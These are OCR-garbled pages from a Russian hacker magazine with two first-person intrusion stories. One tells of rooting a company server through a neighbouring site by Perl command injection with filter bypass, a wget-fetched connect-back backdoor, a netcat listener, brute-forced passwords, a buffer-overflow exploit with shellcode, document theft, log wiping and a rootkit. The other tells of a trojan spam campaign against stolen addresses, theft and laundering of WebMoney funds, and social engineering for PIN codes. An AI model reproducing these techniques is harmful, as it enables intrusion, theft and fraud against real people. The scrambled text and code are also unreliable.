ходятся на защищенном паролем ресурсе. Поэтому утянуть интересую- 
щие файлы снаружи, через какой-нибудь элементарный ѵѵеЬ-баг, было 
невозможно. По всему выходило, что надо будет рутать эту машину. 



Я был в долгу перед этим чело- 
веком, к тому же его предложе- 
ние меня заинтересовало и с 
технической точки зрения — не 
каждый день доводится ломать 
проекты серьезных компаний. 
Поэтому, обговорив некоторые 
детали относительно интересу- 
ющих документов, я перешел к 
активным действиям по взлому 
сетевого ресурса. 





На нашем диске ты най- 
дешь документацию по 
дбЬ, а также некоторые 
статьи по атакам на пере- 
полнение буфера. 

Незаконный доступ к чу- 
жой информации — это, 
дружок, статья. Взлом чу- 
жой программы — это то- 
же статья. Получение гооі- 
привилегий на неизвест- 
ном тебе сервере — это 
уже, наверное, даже две 
статьи. Статей много, ты — 
один. Не дай им себя заже- 
вать. Не нарушай законов. 



[неспортивный взлом?] 

Первым делом я решил проска- 
нировать сайт организации (на- 
зову его ѵѵѵѵѵѵ.ехатріе.огд) с за- 
бугорного шелла птар'ом в ре- 
жиме стелс-скана. Оказалось, 

что на сервере для внешнего доступа открыто минимум портов и, совер- 
шенно определенно, администратор нормально настроил файрвол. 
Брандмауэр также безжалостно резал весь ІСМР-трафик — ни один па- 
кет не вернулся в ответ на мой ріпд. По всему выходило, что админист- 
ратор этого сервера — адекватный человек и нормально настроил файр- 
вол, более того, баннеры стандартных серверов, открытых для доступа 
из инета указывали на то, что версии демонов регулярно обновляются, и 
админ следит за новостными лентами. Тогда я решил присмотреться к 
сайту организации и поискать там бажные скрипты — может быть, там 
стоит древний форум или какой-нибудь другой бажный движок. 



[немного экстрима] Увы, но ни одного публичного движка на сайте ус- 
тановлено не было, да и вообще, бажных скриптов, как казалось, здесь не 
было в принципе. Все работало как часы: управляющие значения переда- 
вались скриптам в виде чисел ( тѵѵѵ.ехатрІе.огд/аЬои1.рНр?рагат=32 ) и их 
значения корректно фильтровались от специальных символов, то есть ни- 
какой ЗОЬинъекции здесь не было и в помине. Чтобы долго не мучиться, я 
зашел на доодіе.ги и попросил его поискать СОІ и РНР скрипты: 
іпигІ:шш.ехатрІе.огд ИІеіуре:СОІ/РНР. Однако ни один из найденных скрип- 
тов не поддался моему дурному влиянию: все программы были написаны 
вменяемыми разработчиками, и видимых ошибок в них не было. И тогда я 
вспомнил про атаку Веѵегзе ІР Іоокир, которую N30 описывал в мартовс- 
ком номере журнала. В самом деле, ведь у этого сайта, вполне возможно, 
есть соседи: хоть машина целиком и принадлежала ломаемой организа- 
ции, скорее всего, на этой площадке хостились и другие, дружественные, 
проекты. Поэтому я решил попробовать в действии геѵегзе ІР Іоокир. 

[зайдем к соседям] Для танкистов поясню, что этот метод подразу- 
мевает получение информации обо всех виртуальных серверах, распо- 
ложенных на одной машине с атакуемым ресурсом. Цель получения 
этой информации — взломать один из сайтов-соседей и использовать 
эту площадку для дальнейшего проникновения. Так я и поступил: зайдя 
на уѵуѵуѵ.сіотаіпзбЬ.пеі, я ввел адрес ресурса в форму и получил в ответ 
два сайта: ѵѵѵѵѵѵ.іагдеі.сот и шшш.Наскте.пек Чтобы двигаться дальше, 
мне надо было сломать один из этих серверов. Поскольку 
ѵѵѵѵѵѵТагдеІ.сот был первым в моем списке, я принялся за него, но спус- 
тя 15 минут я понял, что тут нет ни одного скрипта и мне ничего не све- 
тит. А вот Наскте.пеі выглядел посимпатичнее, и что-то подсказывало 
мне — я на верном пути. 

[подводные камни] Я довольно быстро отыскал бажный скрипт. Как только 
я увидел ссылку вида м/т.Насктелеі/сотрапу/соІІеадиез/ѵѵНоіз.рІ?ітаде=зеті- 
керд, на моем лице появилась улыбка и я понял, что интуиция меня не подве- 
ла. Я не знал, как именно открывается этот файл, поэтому попробовал различ- 
ные варианты дальнейшей атаки. 

Из всех испытанных мною вариантов, требуемого результата добился толь- 
ко один запрос: \т/ш.Наскте.пеѴсотрапу/соІІеадиез/ѵѵНоіз.рІ?ітаде=ІзІ. В 
результате этого реквеста, на сервере выполнилась команда Із. Через 
несколько секунд я уже знал, что веб-сервер крутится под пользовате- 
лем поЬобу, однако выяснить версию системы не представлялось воз- 
можным: привычная команда ипате -а не выполнялась. По-видимому, 
админ фильтровал пробелы и не пускал такие строки на обработку прог- 
раммы. Настало время для обхода фильтрации. Я решил попробовать 
вместо пробела вставлять переменную окружения $ІРЗ, а заодно научит- 
ся выполнять РегІ-код. Моя догадка получила подтверждение, и обратив- 
шись к ѵѵѵѵѵѵ.Ііаскте.пеі/сотрапу/соІІеадиез/уѵІіоі8.рІ?ітаде-ипате$ІР8- 
аі, я узнал все сведения об установленной системе — это был последний 
пропатченный І_іпих, сплоитов для которого не было. Так что придется 
мне поднимать привилегии вручную :). 





Решено было закачать на сервер соппЬаск-бэкдор, тем более, что на 
площадке был установлен ѵѵдеі. Я посмотрел АЗСІ 1-таблицу и узнал ко- 
ды требуемых мне для дальнейшей атаки символов: дефис (45), слэш 
(47), одинарная кавычка (39) и вертикальная черта (7С). 

Это было сделано для того, чтобы обойти фильтрацию: неугодный сим- 
вол можно было легко заменить РегІ-конструкцией сНг(КОД_СИВОЛА), 
передав эту строку на выполнение интерпретатору РегІ: 

ѵшѵѵФаскте.пеѴсотрапу/соІІеадие8/ѵѵІіоі5.рІ?ітаде='регІ$ІР5-е 

$ІР8"ргіпі$ІР8.сІіг(39).ѵ\/деі$ІРЗіпІесіог5-хос1.пагосІ.ги.с1іг 

(39).сИг(47).соппЬаск.с$ІРЗ.сИг(45).0 , .сИг(47). , 1:тр , .сПг(47). , соппЬаск.с.сІіг(39)Т 

Так я залил бэкдор и скомпилировал уже установленный ОСС: 

\л/\л/\л/. Паскте. пеі:/сотрапу/соІІеадие5/\л/Іпоіз.рІ?ітаде=' регІ$І Р8- 
е$ІРЗ"ргіпІ$ІР8.сІіг(39).дсс$ІРЗсоппЬаск.с$ІР8.с[іг(45).$ІРЗ.сІіг(47).Іт 
р.сИг(47).соппЬаск.сІпг(39)"Г 

Программа собралась удачно и я запустил ее, установив в бэкдоре 80 
портов для подключения — чтобы строгий файрвол пропустил соедине- 
ние. Затем я запустил на собственном дедике неткат на 80 порту и стал 
ждать коннекта: 

пс -I -р 80 

Бэкдор успешно соединился и я получил доступ к полноценной командной 
оболочке. 

[дайте рута после брута] Получить шелл — значит получить и файл 
/еіс/раззуѵб. Я достал файл паролей ( саі /еіс/раззѵѵд), установил уни- 
кальный брутфорсер Нусіга от ТНС (об этом брутфорсе мы писали в ян- 
варе) и начал брутфорсить пароли системных пользователей. Я сбрут- 
форсил всего два пароля, однако полученные учетные записи были ог- 
раничены по своим возможностям. Однако локальные привилегии — 
это уже большое дело, мои шансы на взлом резко возросли. 

[неожиданный поворот событий] К моему сожалению, все Ііізіогу- 
файлы, которые я смог отыскать (.ЬазМіізІогу, . ту зц І_И і зо гу) , не дали мне 
ничего хорошего, зато я легко узнал полный путь к ѴѴѴѴѴѴ-каталогу, прочи- 
тав ГШрсІ.соггі. Вскоре я нашел *.іпс-файл с настройками какой-то РНР-сис- 
темы, в которой обнаружил информацию для соединения с базой данных 
МуЗОІ_. К МуЗОІ_ эти пароли подошли, а вот на РТР и ЗЗН меня с ними не 
пустили. Насколько я понял, администратор поставил на все сервисы раз- 
ные пароли, что опять-таки свидетельствует в пользу его квалификации. 
Как я уже отмечал, на сервере стоял пропатченный І_іпих, версии систем- 
ных демонов были также стабильными и казалось, что поднять привилегии 
невозможно. Но я не сдавался, и принялся досконально изучать систему. 
На сервере крутилась куча ЮЗ — РогіЗепІгу, СИгооІкіІ и Зпоіі. Стоило быть 
поаккуратнее. Команда Іазі -10 говорила о том, что админ регулярно появ- 
ляется в системе. После просмотра процессов системы (рз -ах), я заметил 
один знакомый процесс — зузасІЗ. Было такое ощущение, что я его где-то 
видел. И в самом деле, я уже встречал это приложение в одной из дирек- 
торий сервера в виде исходника на С. Скачав себе сишник, я понял, что ад- 
мин является кодером по совместительству. Он наколбасил самопальную 
утилиту, которая следила за состоянием системы, но была еще довольно- 
таки сырой. Читая исходный код этой утилиты, я нашел в ней баг — пере- 
полнение буфера, что явилось для меня неожиданностью. Однако все это 
могло дать неограниченные возможности в системе, поскольку программа 
была запущена под рутовыми привилегиями — оставалось написать гра- 
мотный шелл-код, и получить абсолютный доступ к системе. 



ПРОТЯНИ РУКУ 




Когда-то в древности Великий Учитель решил испытать 
своих учеников, предложив им выбрать для себя мечи. 

Один из них выбрал легкий меч, надеясь сохранить силы 
в долгом походе. Другой выбрал длинный меч, надеясь 
поразить им больше противников с безопасного расстояния. 
Но самым мудрым оказался третий ученик, который 
выбрал для себя самый удобный меч, ставший продолже- 
нием его руки. 

Удобство — вот разумный выбор! 



окііск 780І_ 
МиШтесІіа КеуЬоагб 




ѵллл/ѵѵ. окііск. ги 

©товар сертифицирован 
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поиск бажных скриптов на сайте ничем не увенчался 



[не дом и не улица] Давай 
вспомним, что же является глав- 
ным фактором успеха в атаках 
на переполнение буфера? Пра- 
вильно, корректная подмена ад- 
реса возврата, на тот, по кото- 
рому лежит хакерский выполня- 
емый код — например, функция 
на вызов командного интерпре- 
татора с рутовыми привилегия- 
ми. Именно это и было моей 
целью. Сейчас я расскажу тебе, 
как мне удалось написать 
эксплойт для самопальной ад- 
минской программы. Если ЬиІІег оѵегЛоѵѵ — это пробел в твоих зна- 
ниях, то советую обратиться к соответствующему спецвыпуску X. 
Первым делом, чтобы ты лучше представлял себе предмет разговора, я 
покажу тебе кусок уязвимого кода: 

[бажный код ЬиТоѵе.с] 

сііаг *епѵ; 
сИаг ЬиТ[1 00]; 

епѵ = деІепѵ("ВАМ0РТІМЕ"); 
іі ( епѵ == І\ІШ_І_ ) { геіигп 0; } 
зргіпЩЬиІ, "%5", епѵ); 
геіигп 0; 

Как легко понять, этот код читает переменную окружения ВАМОРТІМЕ 
при помощи функции де1епѵ(), а затем записывает прочитанную строку 
в буфер ЬиІ (сИаг Ьиі[100]). Тут все просто, и уязвимость, что называет- 
ся, налицо. Затем я записал в ВАМОРТІМЕ тысячу букв А (код 0x41) при 
помощи следующего кода: 

[ЬиТоѵе2иге.с] 

іпі таіп(іп{ агдс, сііаг *агдѵ[]) 

{ 

сііаг ЬиТ[1 000]; 
тет5еІ(ЬиІ, 0x41, 1000); 
зеІепѵ(" ВАМОРТІМЕ", ЬиІ, 1); 
ехесІ("епѵ", "епѵ", ІМІІЩ; 

} 





Собрав при помощи дсс на своей площадке эти программы, я выполнил 
их и убедился в том, что произошло переполнение: появилось стандарт- 
ное для ІІпіх сообщение — Зедтепіаііоп ІаиІІ (соге битресі). Все, теперь 
настало время наколбасить эксплойт к этому приложению и получить 
рутовые права на атакуемой машине. 

[шелл-код в смокинге] Не нужно быть гением лингвистики, чтобы 
понять: слова Зедтепіаііоп ІаіШ (соге битресі), обозначают, что прои- 
зошло переполнение, и что на диск записан дамп памяти упавшего про- 
цесса. При помощи отладчика дбЬ можно открыть этот файл и получить 
некоторые дополнительные сведения: 

$ дбЬ -соге ргос.соге 
Соге ѵѵаз депегаіесі Ьу 'АААА'. 

Ргодгат Іегтіпаіесі ѵѵШі зідпаі 11, Зедтепіаііоп ІаиІЕ 

ѵѵагпіпд: сиггепІ_зоз: Сап'І геасі раШпате Тог Іоасі тар: ІприТ/оиТриТ еггог 

ВеаШпд зутЬоІз Ігот /ІіЬЛІз/ІіЬс.зо.6...сіопе. 

ЕоасіесІ зутЬоІз Тог /МЬ/ТІз/МЬс.зо.6 
Веабіпд зутЬоІз Ігот /МЬ/ІсІ-Ііпих.50.2...сІопе. 

ЕоасіесІ зутЬоІз Тог /ІіЬ/ІсІ-Ііпих.зо.2 
# 0 0x36333135 іп?? () 

// 0x36333135 — выдумано ;) 

Далее мне понадобилось выяснить адрес возврата на шелл-код. Для 
этого я глянул регистр ЕЗР: 

х/ЮОх $ЕЗР 

ОхсМІсО: 0x36333135 0x36333135 0x36333135 0x36333135 
ОхсМЗІО: 0x36333135 0x36333135 0x36333135 0x36333135 //Вот он! 



Все, теперь мне осталось только написать эксплойт. Я довольно быстро 
наколбасил его, и сейчас покажу тебе этот простенький код: 



[готовый эксплойт] 

сііаг 5ІіеІІіпТесТог[] = 

"\х3 1 \хсО\х3 1 \хсІ Ь\хЬ0\х1 7\хсб\х80" 

"\х3 1 \хс0\х50\х68\х2Т\х2Т\х7 3\х68" 
м \х68\х2Т\х62\х69\х6е\х89\хеЗ\х50" 
м \х53\х89\хе1\х99\хЬ0\х0Ь\хссі\х80"; 
іпТ таіп(іпТ агдс, сИаг *агдѵ[]) 

{ 

Іопд ВЕТ; 
іпТ і; 

сііаг ЬиТ[1 000]; 
сііаг *р; 

ВЕТ = ОхсТТТТЗІ 0; 
р = ЬиТ; 

тетзеІ(ЬиІ, 0x41, 1 000+1 -зТгІеп(зІіеІІіпТесТог)); 
зргіпТТ(ЬиТ+1 000+1 -5ТгІеп(зІіеІІіпТесТог), "%5", зИеІІрге); 
Тог ( і = 0; і <= 500; і+= 4 ) 

*(Іопд*)(р+і) = ВЕТ; 
зеТепѵ( м ВАМ0РТІМЕ м , ЬиТ, 1); 
ехесІ("епѵ", "епѵ" , ЬиТ, ІМІШ); 

} 



Здесь зГіеІІіпІесІог — это машинный код, который выполняется с приви- 
легиями текущего процесса, в моем случае — под рутом. Я просто за- 
пускал командный интерпретатор. 

Дописав сплоит, я собрал его и запустил на ломаемой машинке, 
мгновенно получив абсолютные привилегии на сервере. Не долго 
размышляя, я при помощи Іосаіе отыскал требуемые документы, 
сжал их в один фг-архив, слил их через ГіирсІ, потер логи и уже со- 
бирался забыть всю эту историю. 

[закрепление позиций] Однако мне было жаль так просто покидать 
хорошую площадку, и я решил закрепить свои позиции. Я немного под- 
корректировал код сГігооІкіГа, чтобы он не видел моего бэкдора, и уста- 
новил на взломанную машину ЗНѴ5: 

./зеіир хакердѵѵегТу 31337 

Затем я снова почистил за собой все логи, поудалял временные файлы, 
проверил пеізіаі-листы и свалил спать. Теперь у меня был отличный 
плацдарм для следующих сетевых атак, который я, конечно же, никогда 
не буду использовать, поскольку уважаю наше законодательство ;) © 










...и ты в интернете! 
Кнопка і-тосіе” - это быстрый доступ 
к возможностям интернета в твоем мобильном 
телефоне. Почта, новости, афиша, погода, спорт, 
мелодии, картинки и многое другое. Теперь не нужно 
никаких настроек. Все просто: теперь твой новый 
телефон с кнопкой і-тосіе уже готов к работе! 



Подробности в офисах МТС 
и центрах мобильной связи СВЯЗНОЙ 
ѵѵѵѵѵѵ.ітосіе.тІіБ.ги ѵѵѵѵѵѵ.зѵуагпоу.ги 



новая кнопка на твоем мобильном 



будь в і-тосіе 



Ты войдешь 

быстрее 

чем перевернешь 
эту страницу! 



Нажми на кнопку 



ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕВВІІМ НЬЮСЫ 




<Ьг> Е2Е4 <Ьг> 
<Ьг> ОЗР5 <Ьг> 



ОДНИМ ИЗ САМЫХ ЭФФЕКТИВНЫХ И ПОПУЛЯРНЫХ 
МЕТОДОВ ПОЛУЧЕНИЯ КОНФИДЕНЦИАЛЬНОЙ ИНФОР- 
МАЦИИ ЯВЛЯЕТСЯ ПРОТРОЯНИВАНИЕ ПОЛЬЗОВАТЕ- 
ЛЕЙ. И ХОТЬ БОЛЬШИНСТВО ЛЮДЕЙ СЧИТАЮТ ЭТОТ 
ПРИЕМ БАНАЛЬНЫМ И ДЕТСКИМ, ПРИ ИСПОЛЬЗОВА- 
НИИ ЭФФЕКТИВНОГО ПРИВАТНОГО СОФТА ДАЖЕ СА- 
МЫЙ БЕЗДАРНЫЙ СЕТЕВОЙ ОТМОРОЗОК МОЖЕТ ЛЕГ- 
КО УПЕРЕТЬ ВСЕ ТВОИ ПАРОЛИ И ЭЛЕКТРОННЫЕ 
ДЕНЬГИ. ЧТОБЫ ПОКАЗАТЬ ТЕБЕ ОПАСНОСТЬ СОВРЕ- 
МЕННЫХ ТРОЯНОВ, МАЗТЕРМ.АМЕ-МАЗТЕВ НАШЕЛ ОД- 
НОГО ТАКОГО СЕТЕВОГО НЕГОДЯЯ, КОТОРЫЙ ПОВЕ- 
ДАЛ О СВОИХ ЗАНЯТИЯХ СЕТЕВЫМИ ГРАБЕЖАМИ. 
ЧИТАЙ, И НЕ ПОПАДАЙСЯ I Мазіег-іате-тазіег 

Троянный заработок сетевых отморозков 

[хакерский арсенал] Однажды по счастливой случайности мне удалось 
достать приватный эксплойт к уязвимости СОМ ОЬ]ес1з Іпзіапйайоп для 
Іпіегпеі Ехріогег ( шш.зесигііуІаЬ.ги/рос/222225.рІір ). В отличие от показа- 
тельных публичных релизов, этот сплоит действительно делал свое дело — 
фабриковал свирепый НТМІ_- документ, после просмотра которого ослик 
послушно скачивал и запускал произвольный файл из инета. Что касается 
меня, то я давно занимаюсь различными махинациями и могу без труда впа- 
рить ссылку ушастому ламеру, чтобы посмотреть, какую инфу он хранит на 
своем компьютере. Но в данный момент мне хотелось чего-то большего, чем 
просто ламерский контент. Мой хороший знакомый, с которым мы вместе 
работаем, подогнал мне несколько е-таіі-баз суммарным числом в 500000 
русских почтовых адресов. По его словам, все эти базы он увел через взло- 
манные форумы, на которых таился баг в нашумевшем модуле РНР-ВРС. 
Г лядя на все вышеописанное добро, ко мне пришла дельная мысль — прос- 
памить на все эти адреса какую-нибудь левую ссылку, ведущую к НТМЬдо- 
кументу моего нового троянца. Решение было классным, и я решил заняться 



этим темным дельцем. Однако прежде, чем приступать к наступлению, 
нужно было тщательно продумать механизм впаривания левой ссылки. 
Рекламировать виагру и средство для увеличения половых органов мне 
не хотелось — уж очень все это банально и недейственно. Ссылки на 
«секретные базы данных» также были изначально провальным вариан- 
том, ведь каждому пользователю в день приходит по сотне троянцев, ра- 
зосланных именно таким способом. Нужно было найти новый прием, ко- 
торый еще мало обкатан или не обкатан вообще. И я его нашел. Как-то 
раз я получил в свой ящик письмо с адреса топіса@ро8ІсагсІ.ги, в кото- 
ром говорилось, что кто-то прислал мне поздравительную открытку. 
В теле письма находились две ссылки — одна, ведущая на скрипт полу- 
чения открытки с ее номером, а вторая — на главную страницу сайта. Не 
знаю почему, но я решил кликнуть по второй — и был прав. Введя код 
открытки, я получил сообщение о том, что такого кода не существует. 
Этот факт заставил меня усомниться в политкорректности входящего 
письма. Посмотрев исходник НТМЦ я понял, что ссылка на получения 
посткарты подделана и ведет в неизвестное направление :). Данный при- 
емчик я взял на заметку, а чтобы у пользователей не было выбора, я ре- 
шил просто убрать ссылку на главную страницу из письма. 

И вот наступил долгожданный момент. Настроив ЭагкМаіІег на виндо- 
вом дедике и подвязав к нему файл с проксиками, я нажал на Зіагі. 
В течение определенного времени программа трудилась над рассылкой 
сообщений, и вот ей это удалось. С огромным нетерпением я стал до- 
жидаться результата своей работы. 

Сделаю небольшое лирическое отступление и расскажу о трояне, кото- 
рый скрывался за сфабрикованным документом. Эксплойт успешно 
транспортировал файл 1 .ехе на компьютер жертвы. Под этим име-нем на- 
ходился продвинутый формграббер, 
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Текст статьи приводит- 


ся аз із, так как нам его 


прислал этот человек. 
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Как на него реагировать 




— решать только тебе, 




всю ответственность за 




свои поступки несешь 




только ты сам. 



который умел грабить все вбитые 
формы за определенный период, а 
также забирать с компьютера паро- 
ли, ѴѴМ-ключи, сертификаты и про- 
чие полезные вещи. Данный трой 
жил на зараженной машине ровно 
два дня, а затем сам себя уничто- 
жал, перед смертью посылая завет- 
ные логи на мой е-таіі. Таким обра- 
зом, мне нужно было подождать 
всего двое суток, чтобы увидеть пер- 
вые результаты атаки. 






[разбор полетов] Как и ожидалось, в течение двух-трех дней моя 
почта была завалена всяческими логами. Их, конечно, было не полмил- 
лиона, но 200 — 300 машин мне точно удалось заразить. В журналах 
формграббера находилось много всякой ерунды — логи каких-то чатов, 
аккаунты на порносайты и, разумеется, пароли на почтовые ящики и 
РТР-сайты. Особенно мне запомнились два человека, которых мне уда- 
лось раздеть до нитки (ну и урод же ты! — прим. ред.). Об этих типах 
я расскажу тебе в красочных подробностях. 

[просто Андрей] На третий день на почту упал лог о компьютере 
с именем Апбгеѵѵ. Судя по всему, его хозяин проживал в столице, так 
как машина имела московский айпишник. Лог зани- 
мал всего пару килобайт, но информация была до- 
вольно ценной — троянец успешно утащил кѵѵт- 
ключ, три пароля на ѴѴѴѴѴѴ-ресурсы, а также ѴѴМ- 
идентификатор клиента. Я был полностью готов 
к операции «похищение ѴѴ М2». 

Первым делом мне пришлось привести в исходный 
вид кѵѵт-кпючик. Он засылался в ВА8Е64-кодировке, 
которую нужно было перевести в бинарный вид. Для 
этого я воспользовался опііпе-декодером, который 
доступен на странице шѵуѵ.тоіоЫі.сот/иііі/ Ьазе64- 
Несобег-епсоНег.азр. Введя в форму зашифрованный 
текст, я выбрал тип Епсобе и назвал файл 1 .кѵѵт. По 
завершению операции, на моем ИОО находился ра- 
бочий ключик ѴѴеЬМопеу. Далее я запустил ѴРЫ-сое- 
динение и ѴѴМ-кеерег. В последнем ввел ѴѴМЮ, полу- 
ченный троянцем, и пароль. Что касается пассворда, то я был уверен в его 
правильности, так как все отснифанные пароли были одинаковыми (кеу- 
Ьоагб — правда, хороший пароль? :)). Переварив первичные данные, ки- 
пер попросил указать файл ключей. «Всегда пожалуйста!», — сказал я, и 
скормил программе свеженький 1 .кѵѵт. Через полминуты ѴѴМ-кипер сооб- 
щил, что вход удался, но, к несчастью, затребовал активацию. Я пока от- 
ложил этот этап, решив посмотреть, стоит ли игра свеч. Оказалось, что 
стоит, — на 2-кошельке находилось $1520. Кроме того, на рублевом счете 
было достаточно средств, чтобы сходить в элитный ресторан :). В общем, 
слюнки у меня потекли сразу после того, как я визуально оценил баланс. 
Но, к сожалению, это все было геаб-опіу. Чтобы перевести баблос, 
нужно было ввести код активации. А для этого надо было иметь дос- 
туп к почте. Благодаря троянцу я получил логин и пароль к ящику на 



таіі.ги, куда и направил свой браузер. Однако моя радость была не- 
долгой — на МаіІ.ги мне сообщили, что аккаунт был зверски удален и 
предложили мне его восстановить. Я согласился и заново переслал 
код активации, но безуспешно. Тогда мне в голову пришла идея пос- 
мотреть детали аккаунта. И там я увидел совершенно другой е-таіі, 
ведущий в домен третьего уровня *.пе1.ш (в интересах моего приятеля 
реальные адреса не разглашаются). Зайдя туда по ѴѴѴѴѴѴ, я во второй 
раз разочаровался — домена не существовало. Первые мысли были 
не самыми оптимистичными, но все же я попробовал выполнить ко- 
манду Нозі сіотаіп.пеі.ги на моем Ііпих-сервере. Результат показал, что 
домен существует, но частично :). А-записи для хоста не существова- 
ло, но МХ-рекорд был. И вел на живой айпишник, где 
были запущены как РОР, так и ЗМТР-сервис. Закон- 
нектившись на 110 порт, я попробовал авторизовать- 
ся в виде изег/разз. Обломался. Попробовал еще раз, 
но в виде изег@с!отаіп/разз. Вуаля! Сервер ответил, 
что для меня есть 10 новых сообщений, два из кото- 
рых содержали коды активации. 

Осталось вывести все финансы на мой кошелек. 
Делать это напрямую не очень хотелось — у владель- 
ца имелся персональный аттестат, поэтому он мог по- 
дать иск в арбитраж для дальнейших разбирательств. 
Я решил сделать немного по-другому. А именно, вос- 
пользовался услугами опііпе-обменника, переведя все 
средства на е-доіб идентификатор, похищенный мной 
у одного амера пару лет назад :). Затем перевел эти 
бабки уже через другой обменник к себе на кошелек. 
Надо сказать, что у меня имеются несколько идентификаторов, которые 
я регулярно меняю после каждой подобной транзакции. А рублевые фи- 
нансы я оставил законному владельцу — я не жадный, пусть с горя про- 
бухает их в элитном ресторане :). 

[карточный магнат Владимир] Этот лог выделялся сразу. Сплошь 
и рядом виднелись формы одного московского ресурса. Как оказалось, 
посвященного продаже РІЫ-кодов карт. Таких магазинов много: поль- 
зователь платит через ѴѴеЬтопеу или другой системы и получает вза- 
мен РІЫ-код. Лог с именем «Владимир» показал, что обладатель компь- 
ютера принимает непосредственное участие в жизни интернет-магази- 
на. Замаскировавшись, я зашел в админку магазина и обнаружил там 
различные сценарии администрирования. К моему сожалению, пожи- 
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Всего через неделю пос- 
ле моей рассылки на 
ровісагсілі вывесили 
объявление о возмож- 
ных вирусных атаках по 
Е-таіі Увидеть его мож- 
но на главной странице. 

На компакте ты найдешь 
софтинку ВагШаііег для 
массовых рассылок 
по е-таіі 



[ХАКЕР 10 [82] 05 > 



[хакер 10 [82] 05 > ВЗЛОМ 060 ] 








настраиваем ОагкМаіІег 



виться там было просто нечем. Базы РІЫ-кодов были недоступны, мож- 
но было разве что сделать дефейс, добавить новую карточку или изме- 
нить курс доллара. Этот расклад меня нисколько не устраивал, поэто- 
му я стал детально анализировать логи. И мне встретился еще один за- 
мечательный ресурс под названием мѵи /.тіз.ги. Как оказалось, Вовчик 
активно пользовался сервисом І55А (Интернет Система Сервис Або- 
нента), которая позволяла удаленно управлять лицевым счетом поль- 
зователя. Незамедлительно направив туда свой браузер, я успешно за- 
логинился в системе. На счету у Владимира было 4 тысячи рублей, что 
еще раз доказывало принадлежность к интернет-магазину. Первое, что 
мне захотелось сделать — отправить детализацию звонков на почто- 
вый ящик с целью ее изучения. Учитывая тормознутость МТС, деталь- 
ка дошла до меня только через полчаса. Вовчик звонил на 3 — 4 номе- 
ра, один из которых был самым распространенным. Как оказалось, 
этот мобильный принадлежал хозяину магазина АІех'у, его данные, 
включая этот телефон, были выложены в разделе «Контакты». В моей 
голове медленно созревал план захвата, который мог позволить раз- 
житься несколькими телефонными карточками. 

Благодаря логам у меня имелся акцесс на почтовый ящик пользовате- 
ля. Пробив поиском по аське, я нашел ІІІІЧ хозяина. Затем быстренько 
ретривнул пароль на почтовый ящик и оперативно получил его. Прове- 
рив статус у и на тулзой ІІЗСА с азесЬка.ги {Ы\р://изса.азесЬка.ги/воѵѵп- 
Іоад/изса2004.гір), я убедился, что Вовчик не сидит в инвизибле, а 
действительно отключен. Только после этого я законнектился в аську. 
Контакт жертвы насчитывал порядка 60 — 70 уинов, добрая половина ко- 
торых были в онлайне. Не успел я опомниться, как в асю постучался хо- 
зяин интернет-магазина с фразой: «Я добавил новую базу карт, будь 
внимателен :)». После этого мне захотелось грамотно развести Алексея 
на несколько пин-кодов. Вот, что из этого получилось: 




декодируем ключ КѴѴМ 



ЧТО ПОМОГЛО МНЕ ПРИ ВЗЛОМЕ? 

Ц] Я подсмотрел и заюзал чужой нестандартный способ почто- 
вой рассылки, в результате который на левые открытки пове- 
лись несколько сотен человек. 

\ 2 \ Возможности формграббера позволили мне завладеть чу- 
жим ѴѴМЮ’ом. Все потому, что он умел выдирать КѴѴМ-ключи- 
ки, а также пионерить пароли от е-таіі-ящиков. 

[з] Умение красиво общаться с незнакомцами, а также акцесс 
в систему ІЗЗА помогли мне поживиться карточками МТЗ. 



НАБОР ТРОЯНЩИКА 

Для того чтобы успешно заниматься «троянским» бизнесом, 
тебе могут быть полезны следующие вещи: 

Щ Эксплойт для браузера. Обычно такие вещи приватные 
и покупаются на различных форумах за 200 — 300 ѴѴМ2. Будь 
внимателен и покупай только у доверенных лиц, иначе тебя 
могут жестко кинуть. Впрочем, в качестве альтернативы можно 
полоскать мозги по ІСО с просьбой скачать фотку обнаженной 
красотки. Но на этот прием уже мало кто ведется. 

\ 2 \ Формграббер или, собственно, троян, который высылает все 
полезные сведения на хакерский почтовый адрес. Покупается 
на тех же форумах, либо пишется самостоятельно. Но учти, что 
сигнатура у подобной штуковины должна быть уникальная и 
постоянно меняться, чтобы антивирусы не опознавали заразу, 
[з] Средство рассылки по е-таіі или ІСО. Про ІСО-спам уже 
писали, поэтому софт у тебя наверняка имеется. Что касается 
е-таіі спама, то могу от чистого сердца подарить тебе элитную 
программу ЭагкМаіІег. Этот эксклюзив ты найдешь на ЭѴЭ- 
диске Хакера :). 

Щ ѴРІ\І и безопасные проксики. Где их найти, ты уже знаешь :). 
А если не знаешь — перерывай прошлые выпуски X. 

[б] Мозги и прямые руки. Это тебе понадобится при дальней- 
шем разводе людей или анализе логфайлов троянца. 



Ѵоѵа: Слушай, дай 3 карты МТС номиналом 20 в долг. Надо срочно 
пополнить баланс, а уже не купить :(. 

АІех: 0к. Возьми из базы на сервере. 

Ѵоѵа: Доступа нет, я не из дома... 

АІех: Что-то странно все как-то, позвони мне. 

Опа! Жертва почуяла неладное и усомнилась в моей личности. Ладно, 
действуем по плану «Бэ». Я зашел в ІЗЗА и воспользовался услугой отправ- 
ки ЗМЗ. Текст был следующим: 

«Алексей, это Владимир. Позвонить не могу, тут очень шумно. Плиз, 
дай карты». 

И сразу после этого оформил добровольную блокировку телефона 
на месяц, чтобы Алекс ненароком не перезвонил реальному владельцу 
номера. Сразу после этих действий я продолжил развод. 

Ѵоѵа: Блин, завтра позвоню, все объясню. Попал в трудную ситуацию. 
АІех: Да не проблема, вот 3 карты. 

Далее шли долгожданные РІІ\І-коды. Быстренько пополнив баланс на 
своей анонимной симке, я вышел из аськи и почистил почтовый ящик 
жертвы. Настроение улучшилось на порядок, ведь я получил все, что хотел 
от этого интересного лога. 

[Нарру ЕпсІ] Вот такие интересные люди живут в нашем мире. И эти два 
персонажа — не единственные, кого мне удалось развести на денежку. 
И все благодаря многофункциональному грабберу, за который я когда-то от- 
дал 700ѴѴМ2. Найти подобный ты всегда можешь на различных хакерских 

форумах, например, на 
тш. хакеру. пеі. Зара- 
нее говорю, что все 
имена в этой поучи- 
тельной истории — вы- 
мысел, любое совпа- 
дение — случайность. 
И вообще, повторять 
мои трюки опасно для 
жизни :) © 




последствие почтовых рассылок 










Открой для себя 

новую 

реальность 



рсіпТішл ^ 



Благодаря компьютеру Ріехігоп VI Р 
на базе процессора Іпіеі® Репііит® 4 
с технологией НТ Вы сможете 
насладиться реалистичными 
компьютерными играми. 



